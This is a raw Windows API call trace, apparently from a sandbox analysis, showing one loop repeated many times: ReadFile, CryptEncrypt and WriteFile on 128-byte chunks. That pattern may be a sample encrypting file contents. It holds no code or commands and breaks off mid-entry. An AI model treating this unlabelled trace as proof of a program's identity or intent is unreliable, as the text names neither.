[0045.854] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.855] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.855] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.856] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.856] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.857] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.857] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.857] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.857] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.857] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.892] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.892] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.892] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.892] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.892] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.892] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.893] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.893] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.893] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.894] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.894] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.895] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.895] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile (in: hFile=0xd8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.896] WriteFile (in: hFile=0xd4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.896] ReadFile 